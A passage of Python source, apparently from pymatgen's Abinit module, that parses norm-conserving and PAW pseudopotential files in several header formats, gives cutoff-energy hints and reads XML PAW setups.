Copy the pseudopotential to a temporary file and return a new pseudopotential object.
Useful for unit tests in which we have to change the content of the file.
Args:
tmpdir: If None, a new temporary directory is created and files are copied here
else tmpdir is used.
"""
import tempfile, shutil
tmpdir = tempfile.mkdtemp() if tmpdir is None else tmpdir
new_path = os.path.join(tmpdir, self.basename)
shutil.copy(self.filepath, new_path)
# Copy dojoreport file if present.
root, ext = os.path.splitext(self.filepath)
djrepo = root + ".djrepo"
if os.path.exists(djrepo):
shutil.copy(djrepo, os.path.join(tmpdir, os.path.basename(djrepo)))
# Build new object and copy dojo_report if present.
new = self.__class__.from_file(new_path)
if self.has_dojo_report: new.dojo_report = self.dojo_report.deepcopy()
return new
@property
def has_dojo_report(self):
"""True if the pseudo has an associated `DOJO_REPORT` section."""
return hasattr(self, "dojo_report") and bool(self.dojo_report)
@property
def djrepo_path(self):
"""The path of the djrepo file. None if file does not exist."""
root, ext = os.path.splitext(self.filepath)
path = root + ".djrepo"
return path
#if os.path.exists(path): return path
#return None
def hint_for_accuracy(self, accuracy="normal"):
"""
Returns a :class:`Hint` object with the suggested value of ecut [Ha] and
pawecutdg [Ha] for the given accuracy.
ecut and pawecutdg are set to zero if no hint is available.
Args:
accuracy: ["low", "normal", "high"]
"""
if not self.has_dojo_report:
return Hint(ecut=0., pawecutdg=0.)
# Get hints from dojoreport. Try first in hints then in ppgen_hints.
if "hints" in self.dojo_report:
return Hint.from_dict(self.dojo_report["hints"][accuracy])
elif "ppgen_hints" in self.dojo_report:
return Hint.from_dict(self.dojo_report["ppgen_hints"][accuracy])
return Hint(ecut=0., pawecutdg=0.)
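# Small usage sketch (pseudo is any parsed Pseudo instance; the returned numbers depend
# entirely on its dojo report, so none are shown here):
#
#   hint = pseudo.hint_for_accuracy("normal")  # -> Hint(ecut=..., pawecutdg=...)
#   print(hint.ecut, hint.pawecutdg)           # both are 0.0 when no hints are available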
@property
def has_hints(self):
"""
True if self provides hints on the cutoff energy.
"""
for acc in ["low", "normal", "high"]:
try:
if self.hint_for_accuracy(acc) is None:
return False
except KeyError:
return False
return True
def open_pspsfile(self, ecut=20, pawecutdg=None):
"""
Calls Abinit to compute the internal tables for the application of the
pseudopotential part. Returns :class:`PspsFile` object providing methods
to plot and analyze the data or None if file is not found or it's not readable.
Args:
ecut: Cutoff energy in Hartree.
pawecutdg: Cutoff energy for the PAW double grid.
"""
from pymatgen.io.abinit.tasks import AbinitTask
from abipy.core.structure import Structure
from abipy.abio.factories import gs_input
from abipy.electrons.psps import PspsFile
# Build fake structure.
lattice = 10 * np.eye(3)
structure = Structure(lattice, [self.element], coords=[[0, 0, 0]])
if self.ispaw and pawecutdg is None: pawecutdg = ecut * 4
inp = gs_input(structure, pseudos=[self], ecut=ecut, pawecutdg=pawecutdg,
spin_mode="unpolarized", kppa=1)
# Add prtpsps = -1 to make Abinit print the PSPS.nc file and stop.
inp["prtpsps"] = -1
# Build temporary task and run it (ignore retcode because we don't exit cleanly)
task = AbinitTask.temp_shell_task(inp)
task.start_and_wait()
filepath = task.outdir.has_abiext("_PSPS.nc")
if not filepath:
logger.critical("Cannot find PSPS.nc file in %s" % task.outdir)
return None
# Open the PSPS.nc file.
try:
return PspsFile(filepath)
except Exception as exc:
logger.critical("Exception while reading PSPS file at %s:\n%s" % (filepath, str(exc)))
return None
class NcPseudo(metaclass=abc.ABCMeta):
"""
Abstract class defining the methods that must be implemented
by the concrete classes representing norm-conserving pseudopotentials.
"""
@property
@abc.abstractmethod
def nlcc_radius(self):
"""
Radius at which the core charge vanishes (i.e. cut-off in a.u.).
Returns 0.0 if nlcc is not used.
"""
@property
def has_nlcc(self):
"""True if the pseudo is generated with non-linear core correction."""
return self.nlcc_radius > 0.0
@property
def rcore(self):
"""Radius of the pseudization sphere in a.u."""
try:
return self._core
except AttributeError:
return None
class PawPseudo(metaclass=abc.ABCMeta):
"""
Abstract class that defines the methods that must be implemented
by the concrete classes representing PAW pseudopotentials.
"""
#def nlcc_radius(self):
# """
# Radius at which the core charge vanish (i.e. cut-off in a.u.).
# Returns 0.0 if nlcc is not used.
# """
# return 0.0
#
#@property
#def has_nlcc(self):
# """True if the pseudo is generated with non-linear core correction."""
# return True
@property
@abc.abstractmethod
def paw_radius(self):
"""Radius of the PAW sphere in a.u."""
@property
def rcore(self):
"""Alias of paw_radius."""
return self.paw_radius
class AbinitPseudo(Pseudo):
"""
An AbinitPseudo is a pseudopotential whose file contains an abinit header.
"""
def __init__(self, path, header):
"""
Args:
path: Filename.
header: :class:`AbinitHeader` instance.
"""
self.path = path
self.header = header
self._summary = header.summary
# Build xc from header.
self.xc = XcFunc.from_abinit_ixc(header["pspxc"])
for attr_name, desc in header.items():
value = header.get(attr_name, None)
# Hide these attributes since one should always use the public interface.
setattr(self, "_" + attr_name, value)
@property
def summary(self):
"""Summary line reported in the ABINIT header."""
return self._summary.strip()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
return self._zion
@property
def l_max(self):
return self._lmax
@property
def l_local(self):
return self._lloc
@property
def supports_soc(self):
# Treat ONCVPSP pseudos
if self._pspcod == 8:
switch = self.header["extension_switch"]
if switch in (0, 1): return False
if switch in (2, 3): return True
raise ValueError("Don't know how to handle extension_switch: %s" % switch)
# TODO Treat HGH HGHK pseudos
# As far as I know, other Abinit pseudos do not support SOC.
return False
class NcAbinitPseudo(NcPseudo, AbinitPseudo):
"""Norm-conserving pseudopotential in the Abinit format."""
@property
def summary(self):
return self._summary.strip()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
"""Number of valence electrons."""
return self._zion
@property
def l_max(self):
return self._lmax
@property
def l_local(self):
return self._lloc
@property
def nlcc_radius(self):
return self._rchrg
class PawAbinitPseudo(PawPseudo, AbinitPseudo):
"""Paw pseudopotential in the Abinit format."""
@property
def paw_radius(self):
return self._r_cut
#def orbitals(self):
@property
def supports_soc(self):
return True
class Hint:
"""
Suggested value for the cutoff energy [Hartree units]
and the cutoff energy for the dense grid (only for PAW pseudos).
"""
def __init__(self, ecut, pawecutdg=None):
self.ecut = ecut
self.pawecutdg = ecut if pawecutdg is None else pawecutdg
def __str__(self):
if self.pawecutdg is not None:
return "ecut: %s, pawecutdg: %s" % (self.ecut, self.pawecutdg)
else:
return "ecut: %s" % (self.ecut)
@pmg_serialize
def as_dict(self):
return dict(ecut=self.ecut, pawecutdg=self.pawecutdg)
@classmethod
def from_dict(cls, d):
return cls(**{k: v for k, v in d.items() if not k.startswith("@")})
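# Round-trip sketch (the cutoff values are illustrative, not taken from any pseudo):
#
#   h = Hint(ecut=38.0, pawecutdg=52.0)
#   d = h.as_dict()         # pmg_serialize also injects the '@module' and '@class' keys
#   h2 = Hint.from_dict(d)  # '@'-prefixed keys are stripped before calling __init__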
def _dict_from_lines(lines, key_nums, sep=None):
"""
Helper function to parse formatted text structured like:
value1 value2 ... sep key1, key2 ...
key_nums is a list giving the number of keys for each line. 0 if line should be skipped.
sep is a string denoting the character that separates the keys from the value (None if
no separator is present).
Returns:
dict{key1 : value1, key2 : value2, ...}
Raises:
ValueError if parsing fails.
"""
if is_string(lines):
lines = [lines]
if not isinstance(key_nums, collections.abc.Iterable):
key_nums = [key_nums]
if len(lines) != len(key_nums):
err_msg = "lines = %s\n key_num = %s" % (str(lines), str(key_nums))
raise ValueError(err_msg)
kwargs = Namespace()
for (i, nk) in enumerate(key_nums):
if nk == 0: continue
line = lines[i]
tokens = [t.strip() for t in line.split()]
values, keys = tokens[:nk], "".join(tokens[nk:])
# Sanitize keys: In some case we might get strings in the form: foo[,bar]
keys = keys.replace("[", "").replace("]", "")
keys = keys.split(",")
if sep is not None:
check = keys[0][0]
if check != sep:
raise ValueError("Expecting separator %s, got %s" % (sep, check))
keys[0] = keys[0][1:]
if len(values) != len(keys):
msg = "line: %s\n len(keys) != len(value)\nkeys: %s\n values: %s" % (line, keys, values)
raise ValueError(msg)
kwargs.update(zip(keys, values))
return kwargs
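# Illustrative sketch (the input line is assumed, in the style of the headers parsed below):
#
#   line = "1 1 2 0 2001 .00000 pspcod,pspxc,lmax,lloc,mmax,r2well"
#   _dict_from_lines([line], [6])
#   # -> dict-like Namespace: pspcod='1', pspxc='1', lmax='2', lloc='0', mmax='2001', r2well='.00000'
#
# Values stay strings at this point; the header classes below cast them via their astype converters.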
class AbinitHeader(dict):
"""Dictionary whose keys can be also accessed as attributes."""
def __getattr__(self, name):
try:
# Default behaviour
return super(AbinitHeader, self).__getattribute__(name)
except AttributeError:
try:
# Try in the dictionary.
return self[name]
except KeyError as exc:
raise AttributeError(str(exc))
def _int_from_str(string):
"""
Convert string into integer
Raise:
TypeError if string is not a valid integer
"""
float_num = float(string)
int_num = int(float_num)
if float_num == int_num:
return int_num
else:
# Needed to handle pseudos with fractional charge
int_num = np.rint(float_num)
logger.warning("Converting float %s to int %s" % (float_num, int_num))
return int_num
class NcAbinitHeader(AbinitHeader):
"""The abinit header found in the NC pseudopotential files."""
_attr_desc = namedtuple("att", "default astype")
_VARS = {
# Mandatory
"zatom": _attr_desc(None, _int_from_str),
"zion": _attr_desc(None, float),
"pspdat": _attr_desc(None, float),
"pspcod": _attr_desc(None, int),
"pspxc": _attr_desc(None, int),
"lmax": _attr_desc(None, int),
"lloc": _attr_desc(None, int),
"r2well": _attr_desc(None, float),
"mmax": _attr_desc(None, float),
# Optional variables for non linear-core correction. HGH does not have it.
"rchrg": _attr_desc(0.0, float), # radius at which the core charge vanish (i.e. cut-off in a.u.)
"fchrg": _attr_desc(0.0, float),
"qchrg": _attr_desc(0.0, float),
}
del _attr_desc
def __init__(self, summary, **kwargs):
super(NcAbinitHeader, self).__init__()
# pseudos generated by APE use llocal instead of lloc.
if "llocal" in kwargs:
kwargs["lloc"] = kwargs.pop("llocal")
self.summary = summary.strip()
for key, desc in NcAbinitHeader._VARS.items():
default, astype = desc.default, desc.astype
value = kwargs.pop(key, None)
if value is None:
value = default
if default is None:
raise RuntimeError("Attribute %s must be specified" % key)
else:
try:
value = astype(value)
except:
raise RuntimeError("Conversion Error for key %s, value %s" % (key, value))
self[key] = value
# Add remaining arguments, e.g. extension_switch
if kwargs:
self.update(kwargs)
@staticmethod
def fhi_header(filename, ppdesc):
"""
Parse the FHI abinit header. Example:
Troullier-Martins psp for element Sc Thu Oct 27 17:33:22 EDT 1994
21.00000 3.00000 940714 zatom, zion, pspdat
1 1 2 0 2001 .00000 pspcod,pspxc,lmax,lloc,mmax,r2well
1.80626423934776 .22824404341771 1.17378968127746 rchrg,fchrg,qchrg
"""
lines = _read_nlines(filename, 4)
try:
header = _dict_from_lines(lines[:4], [0, 3, 6, 3])
except ValueError:
# The last record with rchrg ... seems to be optional.
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def hgh_header(filename, ppdesc):
"""
Parse the HGH abinit header. Example:
Hartwigsen-Goedecker-Hutter psp for Ne, from PRB58, 3641 (1998)
10 8 010605 zatom,zion,pspdat
3 1 1 0 2001 0 pspcod,pspxc,lmax,lloc,mmax,r2well
"""
lines = _read_nlines(filename, 3)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def gth_header(filename, ppdesc):
"""
Parse the GTH abinit header. Example:
Goedecker-Teter-Hutter Wed May 8 14:27:44 EDT 1996
1 1 960508 zatom,zion,pspdat
2 1 0 0 2001 0. pspcod,pspxc,lmax,lloc,mmax,r2well
0.2000000 -4.0663326 0.6778322 0 0 rloc, c1, c2, c3, c4
0 0 0 rs, h1s, h2s
0 0 rp, h1p
1.36 .2 0.6 rcutoff, rloc
"""
lines = _read_nlines(filename, 7)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def oncvpsp_header(filename, ppdesc):
"""
Parse the ONCVPSP abinit header. Example:
Li ONCVPSP r_core= 2.01 3.02
3.0000 3.0000 140504 zatom,zion,pspd
8 2 1 4 600 0 pspcod,pspxc,lmax,lloc,mmax,r2well
5.99000000 0.00000000 0.00000000 rchrg fchrg qchrg
2 2 0 0 0 nproj
0 extension_switch
0 -2.5000025868368D+00 -1.2006906995331D+00
1 0.0000000000000D+00 0.0000000000000D+00 0.0000000000000D+00
2 1.0000000000000D-02 4.4140499497377D-02 1.9909081701712D-02
"""
lines = _read_nlines(filename, 6)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
# Rename pspd to pspdat, the key expected by NcAbinitHeader.
header.update({'pspdat': header['pspd']})
header.pop('pspd')
# Read extension switch
header["extension_switch"] = int(lines[5].split()[0])
return NcAbinitHeader(summary, **header)
@staticmethod
def tm_header(filename, ppdesc):
"""
Parse the TM abinit header. Example:
Troullier-Martins psp for element Fm Thu Oct 27 17:28:39 EDT 1994
100.00000 14.00000 940714 zatom, zion, pspdat
1 1 3 0 2001 .00000 pspcod,pspxc,lmax,lloc,mmax,r2well
0 4.085 6.246 0 2.8786493 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
1 3.116 4.632 1 3.4291849 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
2 4.557 6.308 1 2.1865358 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
3 23.251 29.387 1 2.4776730 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
3.62474762267880 .07409391739104 3.07937699839200 rchrg,fchrg,qchrg
"""
lines = _read_nlines(filename, -1)
header = []
for lineno, line in enumerate(lines):
header.append(line)
if lineno == 2:
# Read lmax.
tokens = line.split()
pspcod, pspxc, lmax, lloc = map(int, tokens[:4])
mmax, r2well = map(float, tokens[4:6])
#if tokens[-1].strip() != "pspcod,pspxc,lmax,lloc,mmax,r2well":
# raise RuntimeError("%s: Invalid line\n %s" % (filename, line))
lines = lines[3:]
break
# TODO
# Parse the section with the projectors.
#0 4.085 6.246 0 2.8786493 l,e99.0,e99.9,nproj,rcpsp
#.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
projectors = OrderedDict()
for idx in range(2*(lmax+1)):
line = lines[idx]
if idx % 2 == 0: proj_info = [line,]
if idx % 2 == 1:
proj_info.append(line)
d = _dict_from_lines(proj_info, [5,4])
projectors[int(d["l"])] = d
# Add the last line with info on nlcc.
header.append(lines[idx+1])
summary = header[0]
header = _dict_from_lines(header, [0,3,6,3])
return NcAbinitHeader(summary, **header)
class PawAbinitHeader(AbinitHeader):
"""The abinit header found in the PAW pseudopotential files."""
_attr_desc = namedtuple("att", "default astype")
_VARS = {
"zatom": _attr_desc(None, _int_from_str),
"zion": _attr_desc(None, float),
"pspdat": _attr_desc(None, float),
"pspcod": _attr_desc(None, int),
"pspxc": _attr_desc(None, int),
"lmax": _attr_desc(None, int),
"lloc": _attr_desc(None, int),
"mmax": _attr_desc(None, int),
"r2well": _attr_desc(None, float),
"pspfmt": _attr_desc(None, str),
"creatorID": _attr_desc(None, int),
"basis_size": _attr_desc(None, int),
"lmn_size": _attr_desc(None, int),
"orbitals": _attr_desc(None, list),
"number_of_meshes": _attr_desc(None, int),
"r_cut": _attr_desc(None, float), # r_cut(PAW) in the header
"shape_type": _attr_desc(None, int),
"rshape": _attr_desc(None, float),
}
del _attr_desc
def __init__(self, summary, **kwargs):
super(PawAbinitHeader, self).__init__()
self.summary = summary.strip()
for key, desc in self._VARS.items():
default, astype = desc.default, desc.astype
value = kwargs.pop(key, None)
if value is None:
value = default
if default is None:
raise RuntimeError("Attribute %s must be specified" % key)
else:
try:
value = astype(value)
except:
raise RuntimeError("Conversion Error for key %s, with value %s" % (key, value))
self[key] = value
if kwargs:
raise RuntimeError("kwargs should be empty but got %s" % str(kwargs))
@staticmethod
def paw_header(filename, ppdesc):
"""
Parse the PAW abinit header. Examples:
Paw atomic data for element Ni - Generated by AtomPAW (N. Holzwarth) + AtomPAW2Abinit v3.0.5
28.000 18.000 20061204 : zatom,zion,pspdat
7 7 2 0 350 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw3 1305 : pspfmt,creatorID
5 13 : basis_size,lmn_size
0 0 1 1 2 : orbitals
3 : number_of_meshes
1 3 350 1.1803778368E-05 3.5000000000E-02 : mesh 1, type,size,rad_step[,log_step]
2 1 921 2.500000000000E-03 : mesh 2, type,size,rad_step[,log_step]
3 3 391 1.1803778368E-05 3.5000000000E-02 : mesh 3, type,size,rad_step[,log_step]
2.3000000000 : r_cut(SPH)
2 0.
Another format:
C (US d-loc) - PAW data extracted from US-psp (D.Vanderbilt) - generated by USpp2Abinit v2.3.0
6.000 4.000 20090106 : zatom,zion,pspdat
7 11 1 0 560 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw4 2230 : pspfmt,creatorID
4 8 : basis_size,lmn_size
0 0 1 1 : orbitals
5 : number_of_meshes
1 2 560 1.5198032759E-04 1.6666666667E-02 : mesh 1, type,size,rad_step[,log_step]
2 2 556 1.5198032759E-04 1.6666666667E-02 : mesh 2, type,size,rad_step[,log_step]
3 2 576 1.5198032759E-04 1.6666666667E-02 : mesh 3, type,size,rad_step[,log_step]
4 2 666 1.5198032759E-04 1.6666666667E-02 : mesh 4, type,size,rad_step[,log_step]
5 2 673 1.5198032759E-04 1.6666666667E-02 : mesh 5, type,size,rad_step[,log_step]
1.5550009124 : r_cut(PAW)
3 0. : shape_type,rshape
Yet another one:
Paw atomic data for element Si - Generated by atompaw v3.0.1.3 & AtomPAW2Abinit v3.3.1
14.000 4.000 20120814 : zatom,zion,pspdat
7 11 1 0 663 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw5 1331 : pspfmt,creatorID
4 8 : basis_size,lmn_size
0 0 1 1 : orbitals
5 : number_of_meshes
1 2 663 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 1, type,size,rad_step[,log_step]
2 2 658 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 2, type,size,rad_step[,log_step]
3 2 740 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 3, type,size,rad_step[,log_step]
4 2 819 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 4, type,size,rad_step[,log_step]
5 2 870 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 5, type,size,rad_step[,log_step]
1.5669671236 : r_cut(PAW)
2 0. : shape_type,rshape
"""
supported_formats = ["paw3", "paw4", "paw5"]
if ppdesc.format not in supported_formats:
raise NotImplementedError("format %s not in %s" % (ppdesc.format, supported_formats))
lines = _read_nlines(filename, -1)
summary = lines[0]
header = _dict_from_lines(lines[:5], [0, 3, 6, 2, 2], sep=":")
lines = lines[5:]
# TODO
# Parse orbitals and number of meshes.
header["orbitals"] = [int(t) for t in lines[0].split(":")[0].split()]
header["number_of_meshes"] = num_meshes = int(lines[1].split(":")[0])
#print filename, header
# Skip the mesh definition lines.
lines = lines[2+num_meshes:]
#for midx in range(num_meshes):
# l = midx + 1
#print lines[0]
header["r_cut"] = float(lines[0].split(":")[0])
#print lines[1]
header.update(_dict_from_lines(lines[1], [2], sep=":"))
#print("PAW header\n", header)
return PawAbinitHeader(summary, **header)
class PseudoParserError(Exception):
"""Base Error class for the exceptions raised by :class:`PseudoParser`"""
class PseudoParser:
"""
Responsible for parsing pseudopotential files and returning pseudopotential objects.
Usage::
pseudo = PseudoParser().parse("filename")
"""
Error = PseudoParserError
# Supported values of pspcod
ppdesc = namedtuple("ppdesc", "pspcod name psp_type format")
# TODO Recheck
_PSPCODES = OrderedDict( {
1: ppdesc(1, "TM", "NC", None),
2: ppdesc(2, "GTH", "NC", None),
3: ppdesc(3, "HGH", "NC", None),
4: ppdesc(4, "Teter", "NC", None),
#5: ppdesc(5, "NC", , None),
6: ppdesc(6, "FHI", "NC", None),
7: ppdesc(7, "PAW_abinit_text", "PAW", None),
8: ppdesc(8, "ONCVPSP", "NC", None),
10: ppdesc(10, "HGHK", "NC", None),
})
del ppdesc
# Renumber functionals from oncvpsp. TODO: confirm that 3 is 2.
#_FUNCTIONALS = {1: {'n': 4, 'name': 'Wigner'},
# 2: {'n': 5, 'name': 'HL'},
# 3: {'n': 2, 'name': 'PWCA'},
# 4: {'n': 11, 'name': 'PBE'}}
def __init__(self):
# List of files that have been parsed successfully.
self._parsed_paths = []
# List of files that could not be parsed.
self._wrong_paths = []
def scan_directory(self, dirname, exclude_exts=(), exclude_fnames=()):
"""
Analyze the files contained in directory dirname.
Args:
dirname: directory path
exclude_exts: list of file extensions that should be skipped.
exclude_fnames: list of file names that should be skipped.
Returns:
List of pseudopotential objects.
"""
for i, ext in enumerate(exclude_exts):
if not ext.strip().startswith("."):
exclude_exts[i] = "." + ext.strip()
# Exclude files depending on the extension.
paths = []
for fname in os.listdir(dirname):
root, ext = os.path.splitext(fname)
path = os.path.join(dirname, fname)
if (ext in exclude_exts or fname in exclude_fnames or
fname.startswith(".") or not os.path.isfile(path)): continue
paths.append(path)
pseudos = []
for path in paths:
# Parse the file and generate the pseudo.
try:
pseudo = self.parse(path)
except:
pseudo = None
if pseudo is not None:
pseudos.append(pseudo)
self._parsed_paths.append(path)
else:
self._wrong_paths.append(path)
return pseudos
def read_ppdesc(self, filename):
"""
Read the pseudopotential descriptor from file filename.
Returns:
Pseudopotential descriptor. None if filename is not a valid pseudopotential file.
Raises:
`PseudoParserError` if fileformat is not supported.
"""
if filename.endswith(".xml"):
raise self.Error("XML pseudo not supported yet")
else:
# Assume file with the abinit header.
lines = _read_nlines(filename, 80)
for lineno, line in enumerate(lines):
if lineno == 2:
try:
tokens = line.split()
pspcod, pspxc = map(int, tokens[:2])
except:
msg = "%s: Cannot parse pspcod, pspxc in line\n %s" % (filename, line)
logger.critical(msg)
return None
#if tokens[-1].strip().replace(" ","") not in ["pspcod,pspxc,lmax,lloc,mmax,r2well",
# "pspcod,pspxc,lmax,llocal,mmax,r2well"]:
# raise self.Error("%s: Invalid line\n %s" % (filename, line))
# return None
if pspcod not in self._PSPCODES:
raise self.Error("%s: Don't know how to handle pspcod %s\n" % (filename, pspcod))
ppdesc = self._PSPCODES[pspcod]
if pspcod == 7:
# PAW -> need to know the format pspfmt
tokens = lines[lineno+1].split()
pspfmt, creatorID = tokens[:2]
#if tokens[-1].strip() != "pspfmt,creatorID":
# raise self.Error("%s: Invalid line\n %s" % (filename, line))
# return None
ppdesc = ppdesc._replace(format = pspfmt)
return ppdesc
return None
def parse(self, filename):
"""
Read and parse a pseudopotential file. Main entry point for client code.
Returns:
pseudopotential object or None if filename is not a valid pseudopotential file.
"""
path = os.path.abspath(filename)
# Only PAW supports XML at present.
if filename.endswith(".xml"):
return PawXmlSetup(path)
ppdesc = self.read_ppdesc(path)
if ppdesc is None:
logger.critical("Cannot find ppdesc in %s" % path)
return None
psp_type = ppdesc.psp_type
parsers = {
"FHI": NcAbinitHeader.fhi_header,
"GTH": NcAbinitHeader.gth_header,
"TM": NcAbinitHeader.tm_header,
"Teter": NcAbinitHeader.tm_header,
"HGH": NcAbinitHeader.hgh_header,
"HGHK": NcAbinitHeader.hgh_header,
"ONCVPSP": NcAbinitHeader.oncvpsp_header,
"PAW_abinit_text": PawAbinitHeader.paw_header,
}
try:
header = parsers[ppdesc.name](path, ppdesc)
except Exception:
raise self.Error(path + ":\n" + straceback())
if psp_type == "NC":
pseudo = NcAbinitPseudo(path, header)
elif psp_type == "PAW":
pseudo = PawAbinitPseudo(path, header)
else:
raise NotImplementedError("psp_type not in [NC, PAW]")
return pseudo
#TODO use RadialFunction from pseudo_dojo.
class RadialFunction(namedtuple("RadialFunction", "mesh values")):
pass
class PawXmlSetup(Pseudo, PawPseudo):
def __init__(self, filepath):
self.path = os.path.abspath(filepath)
# Get the XML root (this trick is used so that the object is pickleable).
root = self.root
# Get the version of the XML format
self.paw_setup_version = root.get("version")
# Info on the atom.
atom_attrib = root.find("atom").attrib
#self._symbol = atom_attrib["symbol"]
self._zatom = int(float(atom_attrib["Z"]))
self.core, self.valence = map(float, [atom_attrib["core"], atom_attrib["valence"]])
# Build xc from header.
xc_info = root.find("xc_functional").attrib
self.xc = XcFunc.from_type_name(xc_info["type"], xc_info["name"])
# Old XML files do not define this field!
# In this case we set the PAW radius to None.
#self._paw_radius = float(root.find("PAW_radius").attrib["rpaw"])
#self.ae_energy = {k: float(v) for k,v in root.find("ae_energy").attrib.items()}
pawr_element = root.find("PAW_radius")
self._paw_radius = None
if pawr_element is not None:
self._paw_radius = float(pawr_element.attrib["rpaw"])
#<valence_states>
# <state n="2" l="0" f="2" rc="1.10" e="-0.6766" id="N-2s"/>
# <state n="2" l="1" f="3" rc="1.10" e="-0.2660" id="N-2p"/>
# <state l="0" rc="1.10" e=" 0.3234" id="N-s1"/>
# <state l="1" rc="1.10" e=" 0.7340" id="N-p1"/>
# <state l="2" rc="1.10" e=" 0.0000" id="N-d1"/>
#</valence_states>
#
# The valence_states element contains several state elements.
# For this setup, the first two lines describe bound eigenstates
# with occupation numbers and principal quantum numbers.
# Notice, that the three additional unbound states should have no f and n attributes.
# In this way, we know that only the first two bound states (with f and n attributes)
# should be used for constructing an initial guess for the wave functions.
self.valence_states = OrderedDict()
for node in root.find("valence_states"):
attrib = AttrDict(node.attrib)
assert attrib.id not in self.valence_states
self.valence_states[attrib.id] = attrib
#print(self.valence_states)
# Parse the radial grids
self.rad_grids = {}
for node in root.findall("radial_grid"):
grid_params = node.attrib
gid = grid_params["id"]
assert gid not in self.rad_grids
self.rad_grids[gid] = self._eval_grid(grid_params)
def __getstate__(self):
"""
Return state is pickled as the contents for the instance.
In this case we just remove the cached XML root element since Element objects cannot be pickled.
"""
return {k: v for k, v in self.__dict__.items() if k not in ["_root"]}
@lazy_property
def root(self):
from xml.etree import cElementTree as Et
tree = Et.parse(self.filepath)
return tree.getroot()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
"""Number of valence electrons."""
return self.valence
# FIXME
@property
def l_max(self):
"""Maximum angular momentum."""
return None
@property
def l_local(self):
"""Angular momentum used for the local part."""
return None
@property
def summary(self):
"""String summarizing the most important properties."""
return ""
@property
def paw_radius(self):
return self._paw_radius
@property
def supports_soc(self):
"""
Here I assume that the ab-initio code can treat the SOC within the on-site approximation
"""
return True
@staticmethod
def _eval_grid(grid_params):
"""
This function receives a dictionary with the parameters defining the
radial mesh and returns a `ndarray` with the mesh
"""
eq = grid_params.get("eq").replace(" ", "")
istart, iend = int(grid_params.get("istart")), int(grid_params.get("iend"))
indices = list(range(istart, iend+1))
if eq == 'r=a*exp(d*i)':
a, d = float(grid_params['a']), float(grid_params['d'])
mesh = [a * np.exp(d * i) for i in indices]
elif eq == 'r=a*i/(n-i)':
a, n = float(grid_params['a']), float(grid_params['n'])
mesh = [a * i / (n - i) for i in indices]
elif eq == 'r=a*(exp(d*i)-1)':
a, d = float(grid_params['a']), float(grid_params['d'])
mesh = [a * (np.exp(d * i) - 1.0) for i in indices]
elif eq == 'r=d*i':
d = float(grid_params['d'])
mesh = [d * i for i in indices]
elif eq == 'r=(i/n+a)^5/a-a^4':
a, n = float(grid_params['a']), float(grid_params['n'])
mesh = [(i / n + a)**5 / a - a**4 for i in indices]
else:
raise ValueError('Unknown grid type: %s' % eq)
return np.array(mesh)
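# Quick sketch (assumed grid parameters): a linear grid "r=d*i" with d=0.01, istart=1 and
# iend=3 yields np.array([0.01, 0.02, 0.03]); the exponential forms are evaluated in the
# same way from their 'a' and 'd' (or 'n') attributes.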
def _parse_radfunc(self, func_name):
"""Parse the first occurence of func_name in the XML file."""
node = self.root.find(func_name)
grid = node.attrib["grid"]
values = np.array([float(s) for s in node.text.split()])
return self.rad_grids[grid], values, node.attrib
def _parse_all_radfuncs(self, func_name):
"""Parse all the nodes with tag func_name in the XML file."""
for node in self.root.findall(func_name):
grid = node.attrib["grid"]
values = np.array([float(s) for s in node.text.split()])
yield self.rad_grids[grid], values, node.attrib
@lazy_property
def ae_core_density(self):
"""The all-electron radial density."""
mesh, values, attrib = self._parse_radfunc("ae_core_density")
return RadialFunction(mesh, values)
@lazy_property
def pseudo_core_density(self):
"""The pseudized radial density."""
mesh, values, attrib = self._parse_radfunc("pseudo_core_density")
return RadialFunction(mesh, values)
@lazy_property
def ae_partial_waves(self):
"""Dictionary with the AE partial waves indexed by state."""
ae_partial_waves = OrderedDict()
for mesh, values, attrib in self._parse_all_radfuncs("ae_partial_wave"):
state = attrib["state"]
#val_state = self.valence_states[state]
ae_partial_waves[state] = RadialFunction(mesh, values)
return ae_partial_waves
@property
def pseudo_partial_waves(self):
"""Dictionary with the pseudo partial waves indexed by state."""
pseudo_partial_waves = OrderedDict()
for (mesh, values, attrib) in self._parse_all_radfuncs("pseudo_partial_wave"):
state = attrib["state"]
#val_state = self.valence_states[state]
pseudo_partial_waves[state] = RadialFunction(mesh, values)
return pseudo_partial_waves
@lazy_property
def projector_functions(self):
"""Dictionary with the PAW projectors indexed by state."""
projector_functions = OrderedDict()
for (mesh, values, attrib) in self._parse_all_radfuncs("projector_function"):
state = attrib["state"]
#val_state = self.valence_states[state]
projector_functions[state] = RadialFunction(mesh, values)
return projector_functions
def yield_figs(self, **kwargs): # pragma: no cover
"""
This function *generates* a predefined list of matplotlib figures with minimal input from the user.
"""
yield self.plot_densities(title="PAW densities", show=False)
yield self.plot_waves(title="PAW waves", show=False)
yield self.plot_projectors(title="PAW projectors", show=False)
#yield self.plot_potentials(title="potentials", show=False)
@add_fig_kwargs
def plot_densities(self, ax=None, **kwargs):
"""
Plot the PAW densities.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
Returns:
`matplotlib` figure
"""
